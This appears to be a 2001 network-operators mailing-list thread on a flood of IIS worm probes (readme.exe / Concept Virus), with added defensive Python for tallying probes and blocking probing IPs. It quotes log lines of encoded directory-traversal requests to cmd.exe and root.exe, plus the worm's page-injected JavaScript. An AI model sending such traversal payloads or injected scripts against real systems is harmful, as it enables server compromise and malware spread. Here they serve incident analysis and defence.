Worm probes

Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
probes this morning? We're seeing about 8000/second, starting around 9:15
Eastern time, to and from a wide variety of addresses.

Is CodeRed or one of its relatives scheduled to start sweeping again today?
We've never seen this level of traffic related to the NT worms. Even
though we don't run any NT at all, we still have to suffer :(

Kevin

On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one point in time:

Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
probes this morning? We're seeing about 8000/second, starting around 9:15
Eastern time, to and from a wide variety of addresses.

affirmative. i just looked at my logs, and it looks like
each probe tries a bunch of things. i haven't seen much
on the lists, but i'm looking right now.

owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"

First ones appeared today, and so far I see 17650 attempts on just one of my servers. We don't run any Microsoft stuff either, but that doesn't keep our servers from getting hammered...
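The probe lines quoted above, and the per-path tallies that appear later in the thread, are easy to reproduce from an Apache access log. The following is an added example, not code from anyone on the list: it parses combined-format lines, percent-decodes the request path repeatedly so that the double-encoded forms (`..%255c..`, `..%%35%63..`) reveal themselves as `..\..`, and counts hits per path family, per source host and per response status. The sample log is constructed from the quoted lines; the regular expression, the function names and the path-family list are this example's own choices.

```python
"""Tally worm probes in Apache combined-format access logs.

Added example, not from the thread. Double-encoded traversal such as
%255c decodes to %5c and then to a backslash, which is why the path is
decoded until it stops changing before it is classified.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample, patterned on the log lines quoted in the thread.
SAMPLE_LOG = """\
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-"
other.host.net - - [18/Sep/2001:09:56:10 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

# Combined log format: host ident user [time] "method path proto" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Path families counted in the thread; everything else lands in "other".
PATH_FAMILIES = ("/scripts", "/_vti_bin", "/_mem_bin", "/msadc")
WORM_TARGETS = ("cmd.exe", "root.exe")


def decode_fully(path, limit=4):
    """Percent-decode until the string stops changing (at most `limit` rounds).

    Returns (decoded_path, rounds). Two rounds means double encoding.
    """
    rounds = 0
    for _ in range(limit):
        decoded = unquote(path, errors="replace")
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def classify(path):
    """Return the path family of a worm probe, or None for a benign request."""
    decoded, _ = decode_fully(path)
    decoded = decoded.lower()
    if not any(target in decoded for target in WORM_TARGETS):
        return None
    for family in PATH_FAMILIES:
        if decoded.startswith(family + "/"):
            return family
    return "other"   # e.g. the /c/winnt/... and /d/winnt/... share-mapped forms


def tally(log_text):
    """Count probes per family, per source host and per response status."""
    result = {
        "families": Counter(),
        "hosts": Counter(),
        "statuses": Counter(),
        "max_decode_rounds": 0,
    }
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        family = classify(match.group("path"))
        if family is None:
            continue
        _, rounds = decode_fully(match.group("path"))
        result["families"][family] += 1
        result["hosts"][match.group("host")] += 1
        result["statuses"][match.group("status")] += 1
        result["max_decode_rounds"] = max(result["max_decode_rounds"], rounds)
    return result


if __name__ == "__main__":
    summary = tally(SAMPLE_LOG)
    for family, count in sorted(summary["families"].items()):
        print(f"{family}: {count}")
    print("probing hosts:", dict(summary["hosts"]))
    print("statuses:", dict(summary["statuses"]))
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents. The status tally is worth watching: a server that answers these requests with a redirect or a 400 rather than a plain 404 shows up here, which matters given the later observation in the thread that anything other than a 404 draws a follow-up request.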

i'm pretty sure that the worm's attack phase starts on the 20th (which
of course, depends upon a correctly set system clock) and also that
attempting to execute something like /scripts/root.ext/c++ something
is involved.

i think that cert's website would be a good place to look. i'm *not*
a security/virus chick, but i did host a talk by marty linder of cert
where he dissected code red's activity and presented a summary.

cert is of course, http://www.cert.org.

deeann m.m. mikula

director of operations
telerama public access internet
http://www.telerama.com
1.877.688.3200

ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k
box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this
time of day, although still well short of capacity...apache server
processor load is WAY up just from the requests, and the logs are growing
like mad.

We're also seeing a large increase in this activity. This seems to be more
severe than the first time. Have an additional 30 to 40 meg inbound from
this.

Best regards,

Bryan Heitman
CommuniTech.Net, Inc.

This seems to be the culprit:

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

I've nailed a copy, and am working on getting it to the right security
people. A *PRELIMINARY* look (eyeballing the output of 'strings') indicates that
this one *both* sends itself via-email a la SirCam, *AND* scans for vulnerable
web servers, and if it finds a vulnerable server, it causes anybody visiting
that webpage to be offered a contaminated .exe as well.

I do *NOT* have a handle on what malicious effects it has other than just
propagating.

This one's nasty, folks...

indeed. scanning for strings that appear to be associated
with the Concept Virus(CV) V.5, there is a tremendous
increase in bandwidth usage. today alone i match:

/scripts: 18013
/_vti_bin: 1885
_mem_bin: 1916
/ms_adc/: 1945
/winnt/system32: 27648

bugtraq is starting to get in the preliminary reports
of this worm. beware that infected host's home pages
contain a javascript that sends you to a page that
attempts to send you a copy of the worm. fantastic, eh?

-r

On Tue, Sep 18, 2001 at 11:05:35AM -0400, up@3.am said at one point in time:

This is new - it modifies the web pages of the infected machine to
include a (I assume) virus. It adds this string to the web page:

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>

Viewing infected web servers may be dangerous.

Mark Radabaugh
Amplex
(419) 833-3635

I'm sitting behind a dialup box right now, and I just added a log
clause to an ipf rule matching connection attempts to port 80.

I'm averaging 35 probes per minute. Blocking them is quite beneficial
to performance on a v.34 connection :)

Joe

Appears that if it gets a 404 back from its initial unicode scans, it just keeps looking elsewhere. If the server responds with anything other than a 404 (such as a 403 IP Rejected, in this case...) it attempts to get the server to tftp a file named "admin.dll" from the scanning system.

I pulled the admin.dll from an infected box and to my non-programming eyes, it appears to do at least the following (in no order):

1. Adds the guest account to the local Administrators group and then activates the account
2. Use the anonymous
3. Makes sure c$ is shared
4. Tries to mail a bunch of files. HELO it uses is aabbcc. <*** Might be able to use this for a quick and dirty IDS Sig***>
5. Looks like admin.dll ends up in "c", "d" and "e".
6. creates a file named readme.exe which is actually a wav file (weird?)

I could be totally wrong here (and probably am) but oh well...

Chris

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
I've nailed a copy, and am working on getting it to the right security
people. A *PRELIMINARY* look (eyeballing the output of 'strings') indicates that
this one *both* sends itself via-email a la SirCam, *AND* scans for vulnerable
web servers, and if it finds a vulnerable server, it causes anybody visiting
that webpage to be offered a contaminated .exe as well.
I do *NOT* have a handle on what malicious effects it has other than just
propagating.

I work at a large university and our security guys think this guy is what's
been causing us problems all morning. Lots of subnet scans (tons of
incomplete arps), CC Mail servers are wacking out, HPOV noting that
old 3Com gear is dropping etc. This is what I've heard through the rumor
mill (so take it with a grain of salt)...

"...At first blush, it spreads itself via web, email, and maybe shares.
We've seen it spreading by a set of two HTTP requests. It will look for
backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp
to copy itself to the target machine then launches it via a second HTTP
command."

Eric :)

Follow up...

The web page on infected servers includes a script to send and open the
file 'readme.exe' on windows machines. I do not know the details of
what the executable does yet.

Mark

Yes, I saw...

I just contacted our local NIC security guys and they told me that there are
two new worms. One is exploiting the backdoors left by codered 2, and
another worm is (possibly) a "codered 3", which is defacing the web pages
with anti-chinese and anti-poisonbox messages...

Today is the day... :-((((

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I just received this update from Sophos. Perhaps this is the virus that
is spreading?

=== Tim

I just got an e-mail with

  It had readme.exe attached to it. Obviously one should not
open this.

  Time to create a new .procmail rule.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I just received this update from Sophos. Perhaps this is the virus that
is spreading?

-- snip --

I protected against readme.exe specifically several weeks ago. I also
proactively filter all incoming emails for executable attachments.

[Begin sample]
Regarding your message to
x msgid=<x@x.x.net>

You are receiving this message due to the fact a possible email attack was
detected passing through our mail servers
from you. This was probably due to a file attachment. As many of these
attachments can run on their own we only allow harmless file types to be
sent. If you wish to send this file anyway please use a compression program.
If you have further questions please do not hesitate to give me a call at
the number below.

Bill Larson blarson@compu.net
Network Administrator
[Phone numbers here]

REPORT: Trapped poisoned executable "readme.exe"
REPORT: Not a document, or already poisoned by filename. Not scanned for
macros.
STATUS: Message quarantined, not delivered to recipient.

Folks,

If anyone has a packet capture of the infection in progress, would you please contact me. I would like to get it to the some of the Cisco IOS folks ASAP. (Not my official job, but would like to help.)

Thanks!!

Michael Airhart

Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
probes this morning? We're seeing about 8000/second, starting around 9:15

Yes. We are seeing it here bigtime. Does anyone have any apache hacks
to lessen the impact? One idea: Once a probe is sent, the prober's
IP# is stored in a hash (perhaps in shared memory or a mmap'd file
that all children can share) and new connections from that IP are no
longer accepted.

thanks,
-joe
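A sketch of the shared table of prober addresses proposed above, added here as an example and not code from the thread or from Apache: a fixed-size open-addressing hash of IPv4 addresses with a hit counter, kept in a file that every server child maps with `mmap`, so a probe recorded by one child is visible to all of them. The class and function names, the 4096-slot capacity, the three-probe threshold and the `flock`-based locking are this example's assumptions; in a real deployment the record and check calls would sit in a server module's request hooks, and here two `ProbeTable` instances on the same file stand in for two children.

```python
"""Cross-process table of probing IPs in an mmap'd file.

Added example, not from the thread. A worm probe recognised by any child
is recorded with record_probe(); every child then refuses the address once
is_blocked() is true. Unix-only (fcntl.flock).
"""
import fcntl
import mmap
import os
import socket
import struct
import tempfile

SLOTS = 4096                       # capacity; must be a power of two
SLOT_FMT = "<II"                   # (ipv4 as integer, probe count)
SLOT_SIZE = struct.calcsize(SLOT_FMT)
SHIFT = 32 - (SLOTS.bit_length() - 1)   # Fibonacci hashing keeps the high bits
THRESHOLD = 3                      # probes before an address is refused (assumed)


class ProbeTable:
    def __init__(self, path):
        size = SLOTS * SLOT_SIZE
        self.fd = os.open(path, os.O_RDWR | os.O_CREAT, 0o600)
        if os.fstat(self.fd).st_size < size:
            os.ftruncate(self.fd, size)
        # MAP_SHARED by default, so other processes mapping the file see updates.
        self.mm = mmap.mmap(self.fd, size)

    @staticmethod
    def _key(ip):
        """Dotted-quad string -> 32-bit integer; raises OSError on bad input."""
        return struct.unpack("!I", socket.inet_aton(ip))[0]

    def _find(self, key):
        """Linear probe from the hashed slot.

        Returns (offset, count); count == 0 marks an empty slot.
        """
        idx = ((key * 2654435761) & 0xFFFFFFFF) >> SHIFT
        for _ in range(SLOTS):
            off = idx * SLOT_SIZE
            ip, count = struct.unpack_from(SLOT_FMT, self.mm, off)
            if count == 0 or ip == key:
                return off, count
            idx = (idx + 1) & (SLOTS - 1)
        raise RuntimeError("probe table full")

    def record_probe(self, ip):
        """Count one probe from `ip`; returns the new total for that address."""
        key = self._key(ip)
        fcntl.flock(self.fd, fcntl.LOCK_EX)      # serialise read-modify-write
        try:
            off, count = self._find(key)
            struct.pack_into(SLOT_FMT, self.mm, off, key, count + 1)
        finally:
            fcntl.flock(self.fd, fcntl.LOCK_UN)
        return count + 1

    def is_blocked(self, ip):
        """True once `ip` has probed at least THRESHOLD times (lock-free read)."""
        _, count = self._find(self._key(ip))
        return count >= THRESHOLD


def open_probe_table(path=None):
    """Open the shared table at `path`, or a fresh temporary one for testing."""
    if path is None:
        path = os.path.join(tempfile.mkdtemp(prefix="probes-"), "probes.map")
    return ProbeTable(path)


def demo():
    """Two 'children' share one file: what A records, B can see."""
    path = os.path.join(tempfile.mkdtemp(prefix="probes-"), "probes.map")
    child_a, child_b = ProbeTable(path), ProbeTable(path)
    for _ in range(THRESHOLD):
        child_a.record_probe("192.0.2.10")   # constructed address (TEST-NET-1)
    return child_b.is_blocked("192.0.2.10"), child_b.is_blocked("192.0.2.11")


if __name__ == "__main__":
    print(demo())   # (True, False)
```

Entries are never expired here; a production version would store a timestamp alongside the count and let the block lapse, and would bound the table so that a flood of distinct sources cannot fill it.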

It is worse than that. The virus is passing itself off as audio/x-wav;